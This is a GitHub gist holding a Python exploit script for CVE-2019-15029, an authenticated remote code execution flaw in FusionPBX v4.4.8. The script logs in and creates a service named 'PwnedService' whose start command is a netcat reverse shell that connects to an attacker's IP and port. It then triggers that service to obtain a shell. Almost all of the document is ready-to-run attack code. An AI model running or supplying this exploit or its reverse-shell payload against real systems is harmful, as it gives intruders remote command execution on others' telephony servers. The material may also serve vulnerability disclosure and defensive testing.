Skip to content

Instantly share code, notes, and snippets.

@mhaskar mhaskar/FusionPBX-exploit.py Secret

Last active Jun 15, 2020
Embed
What would you like to do?
#!/usr/bin/python3
'''
# Exploit Title: FusionPBX v4.4.8 authenticated Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup
# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) != 6:
print(len(sys.argv))
print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.session()
login_info = {
"username": username,
"password": password
}
login_request = request.post(
url+"/core/user_settings/user_dashboard.php",
login_info, verify=False
)
if "Invalid Username and/or Password" not in login_request.text:
print("[+] Logged In Sucssfully")
else:
print("[+] Error with creds")
service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
# the service name you want to create
"service_name":"PwnedService",
"service_type":"pid",
"service_data":"1",
# this value contains the payload , you can change it as you want
"service_cmd_start":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/f",
"service_cmd_stop":"stop",
"service_description":"desc",
"submit":"Save"
}
request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)
soup = BeautifulSoup(html_page.text, "lxml")
for a in soup.find_all(href=True):
if "PwnedService" in a:
sid = a["href"].split("=")[1]
break
service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)
@belal2019

This comment has been minimized.

Copy link

belal2019 commented Jun 15, 2020

Could you contact me on your

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.